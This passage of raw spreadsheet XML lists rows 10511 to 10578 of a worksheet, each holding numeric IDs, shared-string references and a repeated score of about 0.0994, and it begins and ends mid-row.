      <c r="C10511" s="2" t="s">
        <v>10064</v>
      </c>
      <c r="D10511" s="2">
        <v>1.0</v>
      </c>
      <c r="E10511" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10511" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10512" ht="15.75" customHeight="1">
      <c r="A10512" s="1">
        <v>16799.0</v>
      </c>
      <c r="B10512" s="2">
        <v>4.7778554E7</v>
      </c>
      <c r="C10512" s="2" t="s">
        <v>10065</v>
      </c>
      <c r="D10512" s="2">
        <v>1.0</v>
      </c>
      <c r="E10512" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10512" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10513" ht="15.75" customHeight="1">
      <c r="A10513" s="1">
        <v>17097.0</v>
      </c>
      <c r="B10513" s="2">
        <v>4.8672166E7</v>
      </c>
      <c r="C10513" s="2" t="s">
        <v>10066</v>
      </c>
      <c r="D10513" s="2">
        <v>1.0</v>
      </c>
      <c r="E10513" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10513" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10514" ht="15.75" customHeight="1">
      <c r="A10514" s="1">
        <v>17164.0</v>
      </c>
      <c r="B10514" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C10514" s="2" t="s">
        <v>10067</v>
      </c>
      <c r="D10514" s="2">
        <v>1.0</v>
      </c>
      <c r="E10514" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10514" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10515" ht="15.75" customHeight="1">
      <c r="A10515" s="1">
        <v>17382.0</v>
      </c>
      <c r="B10515" s="2">
        <v>4.9565607E7</v>
      </c>
      <c r="C10515" s="2" t="s">
        <v>10068</v>
      </c>
      <c r="D10515" s="2">
        <v>1.0</v>
      </c>
      <c r="E10515" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10515" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10516" ht="15.75" customHeight="1">
      <c r="A10516" s="1">
        <v>18002.0</v>
      </c>
      <c r="B10516" s="2">
        <v>5.1427273E7</v>
      </c>
      <c r="C10516" s="2" t="s">
        <v>10069</v>
      </c>
      <c r="D10516" s="2">
        <v>1.0</v>
      </c>
      <c r="E10516" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10516" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10517" ht="15.75" customHeight="1">
      <c r="A10517" s="1">
        <v>18135.0</v>
      </c>
      <c r="B10517" s="2">
        <v>5.1814187E7</v>
      </c>
      <c r="C10517" s="2" t="s">
        <v>10070</v>
      </c>
      <c r="D10517" s="2">
        <v>1.0</v>
      </c>
      <c r="E10517" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10517" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10518" ht="15.75" customHeight="1">
      <c r="A10518" s="1">
        <v>18649.0</v>
      </c>
      <c r="B10518" s="2">
        <v>5.345461E7</v>
      </c>
      <c r="C10518" s="2" t="s">
        <v>10071</v>
      </c>
      <c r="D10518" s="2">
        <v>1.0</v>
      </c>
      <c r="E10518" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10518" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10519" ht="15.75" customHeight="1">
      <c r="A10519" s="1">
        <v>18672.0</v>
      </c>
      <c r="B10519" s="2">
        <v>5354439.0</v>
      </c>
      <c r="C10519" s="2" t="s">
        <v>10072</v>
      </c>
      <c r="D10519" s="2">
        <v>1.0</v>
      </c>
      <c r="E10519" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10519" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10520" ht="15.75" customHeight="1">
      <c r="A10520" s="1">
        <v>18885.0</v>
      </c>
      <c r="B10520" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C10520" s="2" t="s">
        <v>10073</v>
      </c>
      <c r="D10520" s="2">
        <v>1.0</v>
      </c>
      <c r="E10520" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10520" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10521" ht="15.75" customHeight="1">
      <c r="A10521" s="1">
        <v>18912.0</v>
      </c>
      <c r="B10521" s="2">
        <v>5.4197445E7</v>
      </c>
      <c r="C10521" s="2" t="s">
        <v>10074</v>
      </c>
      <c r="D10521" s="2">
        <v>1.0</v>
      </c>
      <c r="E10521" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10521" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10522" ht="15.75" customHeight="1">
      <c r="A10522" s="1">
        <v>19170.0</v>
      </c>
      <c r="B10522" s="2">
        <v>5.4959579E7</v>
      </c>
      <c r="C10522" s="2" t="s">
        <v>10075</v>
      </c>
      <c r="D10522" s="2">
        <v>1.0</v>
      </c>
      <c r="E10522" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10522" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10523" ht="15.75" customHeight="1">
      <c r="A10523" s="1">
        <v>19207.0</v>
      </c>
      <c r="B10523" s="2">
        <v>5.4988421E7</v>
      </c>
      <c r="C10523" s="2" t="s">
        <v>10076</v>
      </c>
      <c r="D10523" s="2">
        <v>1.0</v>
      </c>
      <c r="E10523" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10523" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10524" ht="15.75" customHeight="1">
      <c r="A10524" s="1">
        <v>19654.0</v>
      </c>
      <c r="B10524" s="2">
        <v>5.6346981E7</v>
      </c>
      <c r="C10524" s="2" t="s">
        <v>10077</v>
      </c>
      <c r="D10524" s="2">
        <v>1.0</v>
      </c>
      <c r="E10524" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10524" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10525" ht="15.75" customHeight="1">
      <c r="A10525" s="1">
        <v>19765.0</v>
      </c>
      <c r="B10525" s="2">
        <v>5.6741213E7</v>
      </c>
      <c r="C10525" s="2" t="s">
        <v>10078</v>
      </c>
      <c r="D10525" s="2">
        <v>1.0</v>
      </c>
      <c r="E10525" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10525" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10526" ht="15.75" customHeight="1">
      <c r="A10526" s="1">
        <v>19922.0</v>
      </c>
      <c r="B10526" s="2">
        <v>5.7432739E7</v>
      </c>
      <c r="C10526" s="2" t="s">
        <v>10079</v>
      </c>
      <c r="D10526" s="2">
        <v>1.0</v>
      </c>
      <c r="E10526" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10526" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10527" ht="15.75" customHeight="1">
      <c r="A10527" s="1">
        <v>20029.0</v>
      </c>
      <c r="B10527" s="2">
        <v>7001929.0</v>
      </c>
      <c r="C10527" s="2" t="s">
        <v>10080</v>
      </c>
      <c r="D10527" s="2">
        <v>1.0</v>
      </c>
      <c r="E10527" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10527" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10528" ht="15.75" customHeight="1">
      <c r="A10528" s="1">
        <v>20437.0</v>
      </c>
      <c r="B10528" s="2">
        <v>1.2384534E7</v>
      </c>
      <c r="C10528" s="2" t="s">
        <v>10081</v>
      </c>
      <c r="D10528" s="2">
        <v>1.0</v>
      </c>
      <c r="E10528" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10528" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10529" ht="15.75" customHeight="1">
      <c r="A10529" s="1">
        <v>20865.0</v>
      </c>
      <c r="B10529" s="2">
        <v>1.5871237E7</v>
      </c>
      <c r="C10529" s="2" t="s">
        <v>10082</v>
      </c>
      <c r="D10529" s="2">
        <v>1.0</v>
      </c>
      <c r="E10529" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10529" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10530" ht="15.75" customHeight="1">
      <c r="A10530" s="1">
        <v>21244.0</v>
      </c>
      <c r="B10530" s="2">
        <v>1.9800195E7</v>
      </c>
      <c r="C10530" s="2" t="s">
        <v>10083</v>
      </c>
      <c r="D10530" s="2">
        <v>1.0</v>
      </c>
      <c r="E10530" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10530" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10531" ht="15.75" customHeight="1">
      <c r="A10531" s="1">
        <v>21484.0</v>
      </c>
      <c r="B10531" s="2">
        <v>2.3011772E7</v>
      </c>
      <c r="C10531" s="2" t="s">
        <v>10084</v>
      </c>
      <c r="D10531" s="2">
        <v>1.0</v>
      </c>
      <c r="E10531" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10531" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10532" ht="15.75" customHeight="1">
      <c r="A10532" s="1">
        <v>22318.0</v>
      </c>
      <c r="B10532" s="2">
        <v>3.3981264E7</v>
      </c>
      <c r="C10532" s="2" t="s">
        <v>10085</v>
      </c>
      <c r="D10532" s="2">
        <v>1.0</v>
      </c>
      <c r="E10532" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10532" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10533" ht="15.75" customHeight="1">
      <c r="A10533" s="1">
        <v>22781.0</v>
      </c>
      <c r="B10533" s="2">
        <v>4.5245136E7</v>
      </c>
      <c r="C10533" s="2" t="s">
        <v>10086</v>
      </c>
      <c r="D10533" s="2">
        <v>1.0</v>
      </c>
      <c r="E10533" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10533" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10534" ht="15.75" customHeight="1">
      <c r="A10534" s="1">
        <v>23377.0</v>
      </c>
      <c r="B10534" s="2">
        <v>5.5481385E7</v>
      </c>
      <c r="C10534" s="2" t="s">
        <v>10087</v>
      </c>
      <c r="D10534" s="2">
        <v>1.0</v>
      </c>
      <c r="E10534" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10534" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10535" ht="15.75" customHeight="1">
      <c r="A10535" s="1">
        <v>23593.0</v>
      </c>
      <c r="B10535" s="2">
        <v>6353967.0</v>
      </c>
      <c r="C10535" s="2" t="s">
        <v>10088</v>
      </c>
      <c r="D10535" s="2">
        <v>1.0</v>
      </c>
      <c r="E10535" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10535" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10536" ht="15.75" customHeight="1">
      <c r="A10536" s="1">
        <v>23761.0</v>
      </c>
      <c r="B10536" s="2">
        <v>7512893.0</v>
      </c>
      <c r="C10536" s="2" t="s">
        <v>10089</v>
      </c>
      <c r="D10536" s="2">
        <v>1.0</v>
      </c>
      <c r="E10536" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10536" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10537" ht="15.75" customHeight="1">
      <c r="A10537" s="1">
        <v>23845.0</v>
      </c>
      <c r="B10537" s="2">
        <v>8187782.0</v>
      </c>
      <c r="C10537" s="2" t="s">
        <v>10090</v>
      </c>
      <c r="D10537" s="2">
        <v>1.0</v>
      </c>
      <c r="E10537" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10537" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10538" ht="15.75" customHeight="1">
      <c r="A10538" s="1">
        <v>23846.0</v>
      </c>
      <c r="B10538" s="2">
        <v>8195525.0</v>
      </c>
      <c r="C10538" s="2" t="s">
        <v>10091</v>
      </c>
      <c r="D10538" s="2">
        <v>1.0</v>
      </c>
      <c r="E10538" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10538" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10539" ht="15.75" customHeight="1">
      <c r="A10539" s="1">
        <v>24045.0</v>
      </c>
      <c r="B10539" s="2">
        <v>9515697.0</v>
      </c>
      <c r="C10539" s="2" t="s">
        <v>10092</v>
      </c>
      <c r="D10539" s="2">
        <v>1.0</v>
      </c>
      <c r="E10539" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10539" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10540" ht="15.75" customHeight="1">
      <c r="A10540" s="1">
        <v>24289.0</v>
      </c>
      <c r="B10540" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C10540" s="2" t="s">
        <v>10093</v>
      </c>
      <c r="D10540" s="2">
        <v>1.0</v>
      </c>
      <c r="E10540" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10540" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10541" ht="15.75" customHeight="1">
      <c r="A10541" s="1">
        <v>24586.0</v>
      </c>
      <c r="B10541" s="2">
        <v>1.1329898E7</v>
      </c>
      <c r="C10541" s="2" t="s">
        <v>10094</v>
      </c>
      <c r="D10541" s="2">
        <v>1.0</v>
      </c>
      <c r="E10541" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10541" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10542" ht="15.75" customHeight="1">
      <c r="A10542" s="1">
        <v>25269.0</v>
      </c>
      <c r="B10542" s="2">
        <v>1.3394859E7</v>
      </c>
      <c r="C10542" s="2" t="s">
        <v>10095</v>
      </c>
      <c r="D10542" s="2">
        <v>1.0</v>
      </c>
      <c r="E10542" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10542" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10543" ht="15.75" customHeight="1">
      <c r="A10543" s="1">
        <v>25795.0</v>
      </c>
      <c r="B10543" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C10543" s="2" t="s">
        <v>10096</v>
      </c>
      <c r="D10543" s="2">
        <v>1.0</v>
      </c>
      <c r="E10543" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10543" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10544" ht="15.75" customHeight="1">
      <c r="A10544" s="1">
        <v>26952.0</v>
      </c>
      <c r="B10544" s="2">
        <v>1.9609658E7</v>
      </c>
      <c r="C10544" s="2" t="s">
        <v>10097</v>
      </c>
      <c r="D10544" s="2">
        <v>1.0</v>
      </c>
      <c r="E10544" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10544" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10545" ht="15.75" customHeight="1">
      <c r="A10545" s="1">
        <v>26995.0</v>
      </c>
      <c r="B10545" s="2">
        <v>1.9800194E7</v>
      </c>
      <c r="C10545" s="2" t="s">
        <v>10083</v>
      </c>
      <c r="D10545" s="2">
        <v>1.0</v>
      </c>
      <c r="E10545" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10545" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10546" ht="15.75" customHeight="1">
      <c r="A10546" s="1">
        <v>27430.0</v>
      </c>
      <c r="B10546" s="2">
        <v>2.1909581E7</v>
      </c>
      <c r="C10546" s="2" t="s">
        <v>10098</v>
      </c>
      <c r="D10546" s="2">
        <v>1.0</v>
      </c>
      <c r="E10546" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10546" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10547" ht="15.75" customHeight="1">
      <c r="A10547" s="1">
        <v>27691.0</v>
      </c>
      <c r="B10547" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C10547" s="2" t="s">
        <v>10099</v>
      </c>
      <c r="D10547" s="2">
        <v>1.0</v>
      </c>
      <c r="E10547" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10547" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10548" ht="15.75" customHeight="1">
      <c r="A10548" s="1">
        <v>28752.0</v>
      </c>
      <c r="B10548" s="2">
        <v>2.8122951E7</v>
      </c>
      <c r="C10548" s="2" t="s">
        <v>10100</v>
      </c>
      <c r="D10548" s="2">
        <v>1.0</v>
      </c>
      <c r="E10548" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10548" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10549" ht="15.75" customHeight="1">
      <c r="A10549" s="1">
        <v>29308.0</v>
      </c>
      <c r="B10549" s="2">
        <v>3.1274004E7</v>
      </c>
      <c r="C10549" s="2" t="s">
        <v>10101</v>
      </c>
      <c r="D10549" s="2">
        <v>1.0</v>
      </c>
      <c r="E10549" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10549" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10550" ht="15.75" customHeight="1">
      <c r="A10550" s="1">
        <v>29671.0</v>
      </c>
      <c r="B10550" s="2">
        <v>3.3981263E7</v>
      </c>
      <c r="C10550" s="2" t="s">
        <v>10102</v>
      </c>
      <c r="D10550" s="2">
        <v>1.0</v>
      </c>
      <c r="E10550" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10550" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10551" ht="15.75" customHeight="1">
      <c r="A10551" s="1">
        <v>30248.0</v>
      </c>
      <c r="B10551" s="2">
        <v>3.7548039E7</v>
      </c>
      <c r="C10551" s="2" t="s">
        <v>10103</v>
      </c>
      <c r="D10551" s="2">
        <v>1.0</v>
      </c>
      <c r="E10551" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10551" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10552" ht="15.75" customHeight="1">
      <c r="A10552" s="1">
        <v>30916.0</v>
      </c>
      <c r="B10552" s="2">
        <v>4.6807019E7</v>
      </c>
      <c r="C10552" s="2" t="s">
        <v>10104</v>
      </c>
      <c r="D10552" s="2">
        <v>1.0</v>
      </c>
      <c r="E10552" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10552" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10553" ht="15.75" customHeight="1">
      <c r="A10553" s="1">
        <v>31676.0</v>
      </c>
      <c r="B10553" s="2">
        <v>5187255.0</v>
      </c>
      <c r="C10553" s="2" t="s">
        <v>10105</v>
      </c>
      <c r="D10553" s="2">
        <v>1.0</v>
      </c>
      <c r="E10553" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10553" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10554" ht="15.75" customHeight="1">
      <c r="A10554" s="1">
        <v>32293.0</v>
      </c>
      <c r="B10554" s="2">
        <v>5.5481384E7</v>
      </c>
      <c r="C10554" s="2" t="s">
        <v>10087</v>
      </c>
      <c r="D10554" s="2">
        <v>1.0</v>
      </c>
      <c r="E10554" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10554" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10555" ht="15.75" customHeight="1">
      <c r="A10555" s="1">
        <v>32958.0</v>
      </c>
      <c r="B10555" s="2">
        <v>6511268.0</v>
      </c>
      <c r="C10555" s="2" t="s">
        <v>10106</v>
      </c>
      <c r="D10555" s="2">
        <v>1.0</v>
      </c>
      <c r="E10555" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10555" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10556" ht="15.75" customHeight="1">
      <c r="A10556" s="1">
        <v>33320.0</v>
      </c>
      <c r="B10556" s="2">
        <v>7539240.0</v>
      </c>
      <c r="C10556" s="2" t="s">
        <v>10107</v>
      </c>
      <c r="D10556" s="2">
        <v>1.0</v>
      </c>
      <c r="E10556" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10556" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10557" ht="15.75" customHeight="1">
      <c r="A10557" s="1">
        <v>33342.0</v>
      </c>
      <c r="B10557" s="2">
        <v>7599881.0</v>
      </c>
      <c r="C10557" s="2" t="s">
        <v>10108</v>
      </c>
      <c r="D10557" s="2">
        <v>1.0</v>
      </c>
      <c r="E10557" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10557" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10558" ht="15.75" customHeight="1">
      <c r="A10558" s="1">
        <v>33554.0</v>
      </c>
      <c r="B10558" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C10558" s="2" t="s">
        <v>10091</v>
      </c>
      <c r="D10558" s="2">
        <v>1.0</v>
      </c>
      <c r="E10558" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10558" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10559" ht="15.75" customHeight="1">
      <c r="A10559" s="1">
        <v>33690.0</v>
      </c>
      <c r="B10559" s="2">
        <v>8455700.0</v>
      </c>
      <c r="C10559" s="2" t="s">
        <v>10109</v>
      </c>
      <c r="D10559" s="2">
        <v>1.0</v>
      </c>
      <c r="E10559" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10559" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10560" ht="15.75" customHeight="1">
      <c r="A10560" s="1">
        <v>33899.0</v>
      </c>
      <c r="B10560" s="2">
        <v>9213475.0</v>
      </c>
      <c r="C10560" s="2" t="s">
        <v>10110</v>
      </c>
      <c r="D10560" s="2">
        <v>1.0</v>
      </c>
      <c r="E10560" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10560" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10561" ht="15.75" customHeight="1">
      <c r="A10561" s="1">
        <v>34063.0</v>
      </c>
      <c r="B10561" s="2">
        <v>9627707.0</v>
      </c>
      <c r="C10561" s="2" t="s">
        <v>10111</v>
      </c>
      <c r="D10561" s="2">
        <v>1.0</v>
      </c>
      <c r="E10561" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10561" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10562" ht="15.75" customHeight="1">
      <c r="A10562" s="1">
        <v>34085.0</v>
      </c>
      <c r="B10562" s="2">
        <v>9680062.0</v>
      </c>
      <c r="C10562" s="2" t="s">
        <v>10112</v>
      </c>
      <c r="D10562" s="2">
        <v>1.0</v>
      </c>
      <c r="E10562" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10562" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10563" ht="15.75" customHeight="1">
      <c r="A10563" s="1">
        <v>213.0</v>
      </c>
      <c r="B10563" s="2">
        <v>1.4581768E7</v>
      </c>
      <c r="C10563" s="2" t="s">
        <v>10113</v>
      </c>
      <c r="D10563" s="2">
        <v>1.0</v>
      </c>
      <c r="E10563" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10563" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10564" ht="15.75" customHeight="1">
      <c r="A10564" s="1">
        <v>445.0</v>
      </c>
      <c r="B10564" s="2">
        <v>1.7114204E7</v>
      </c>
      <c r="C10564" s="2" t="s">
        <v>10114</v>
      </c>
      <c r="D10564" s="2">
        <v>1.0</v>
      </c>
      <c r="E10564" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10564" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10565" ht="15.75" customHeight="1">
      <c r="A10565" s="1">
        <v>521.0</v>
      </c>
      <c r="B10565" s="2">
        <v>1.8288395E7</v>
      </c>
      <c r="C10565" s="2" t="s">
        <v>10115</v>
      </c>
      <c r="D10565" s="2">
        <v>1.0</v>
      </c>
      <c r="E10565" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10565" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10566" ht="15.75" customHeight="1">
      <c r="A10566" s="1">
        <v>1609.0</v>
      </c>
      <c r="B10566" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C10566" s="2" t="s">
        <v>10116</v>
      </c>
      <c r="D10566" s="2">
        <v>1.0</v>
      </c>
      <c r="E10566" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10566" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10567" ht="15.75" customHeight="1">
      <c r="A10567" s="1">
        <v>3109.0</v>
      </c>
      <c r="B10567" s="2">
        <v>3.6760072E7</v>
      </c>
      <c r="C10567" s="2" t="s">
        <v>10117</v>
      </c>
      <c r="D10567" s="2">
        <v>1.0</v>
      </c>
      <c r="E10567" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10567" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10568" ht="15.75" customHeight="1">
      <c r="A10568" s="1">
        <v>3814.0</v>
      </c>
      <c r="B10568" s="2">
        <v>4.0076916E7</v>
      </c>
      <c r="C10568" s="2" t="s">
        <v>10118</v>
      </c>
      <c r="D10568" s="2">
        <v>1.0</v>
      </c>
      <c r="E10568" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10568" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10569" ht="15.75" customHeight="1">
      <c r="A10569" s="1">
        <v>4223.0</v>
      </c>
      <c r="B10569" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C10569" s="2" t="s">
        <v>10119</v>
      </c>
      <c r="D10569" s="2">
        <v>1.0</v>
      </c>
      <c r="E10569" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10569" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10570" ht="15.75" customHeight="1">
      <c r="A10570" s="1">
        <v>5010.0</v>
      </c>
      <c r="B10570" s="2">
        <v>4.4197021E7</v>
      </c>
      <c r="C10570" s="2" t="s">
        <v>10120</v>
      </c>
      <c r="D10570" s="2">
        <v>1.0</v>
      </c>
      <c r="E10570" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10570" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10571" ht="15.75" customHeight="1">
      <c r="A10571" s="1">
        <v>5017.0</v>
      </c>
      <c r="B10571" s="2">
        <v>4.4213224E7</v>
      </c>
      <c r="C10571" s="2" t="s">
        <v>10121</v>
      </c>
      <c r="D10571" s="2">
        <v>1.0</v>
      </c>
      <c r="E10571" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10571" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10572" ht="15.75" customHeight="1">
      <c r="A10572" s="1">
        <v>5691.0</v>
      </c>
      <c r="B10572" s="2">
        <v>4.6443186E7</v>
      </c>
      <c r="C10572" s="2" t="s">
        <v>10122</v>
      </c>
      <c r="D10572" s="2">
        <v>1.0</v>
      </c>
      <c r="E10572" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10572" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10573" ht="15.75" customHeight="1">
      <c r="A10573" s="1">
        <v>5959.0</v>
      </c>
      <c r="B10573" s="2">
        <v>4.7316248E7</v>
      </c>
      <c r="C10573" s="2" t="s">
        <v>10123</v>
      </c>
      <c r="D10573" s="2">
        <v>1.0</v>
      </c>
      <c r="E10573" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10573" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10574" ht="15.75" customHeight="1">
      <c r="A10574" s="1">
        <v>6577.0</v>
      </c>
      <c r="B10574" s="2">
        <v>4.8917382E7</v>
      </c>
      <c r="C10574" s="2" t="s">
        <v>10124</v>
      </c>
      <c r="D10574" s="2">
        <v>1.0</v>
      </c>
      <c r="E10574" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10574" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10575" ht="15.75" customHeight="1">
      <c r="A10575" s="1">
        <v>7194.0</v>
      </c>
      <c r="B10575" s="2">
        <v>5.0576962E7</v>
      </c>
      <c r="C10575" s="2" t="s">
        <v>10125</v>
      </c>
      <c r="D10575" s="2">
        <v>1.0</v>
      </c>
      <c r="E10575" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10575" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10576" ht="15.75" customHeight="1">
      <c r="A10576" s="1">
        <v>9145.0</v>
      </c>
      <c r="B10576" s="2">
        <v>5.5263144E7</v>
      </c>
      <c r="C10576" s="2" t="s">
        <v>10126</v>
      </c>
      <c r="D10576" s="2">
        <v>1.0</v>
      </c>
      <c r="E10576" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10576" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10577" ht="15.75" customHeight="1">
      <c r="A10577" s="1">
        <v>10060.0</v>
      </c>
      <c r="B10577" s="2">
        <v>5.7125017E7</v>
      </c>
      <c r="C10577" s="2" t="s">
        <v>10127</v>
      </c>
      <c r="D10577" s="2">
        <v>1.0</v>
      </c>
      <c r="E10577" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10577" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="10578" ht="15.75" customHeight="1">
      <c r="A10578" s="1">
        <v>11644.0</v>
      </c>
      <c r="B10578" s="2">
        <v>2.3221384E7</v>
      </c>
      <c r="C10578" s="2" t="s">
        <v>10128</v>
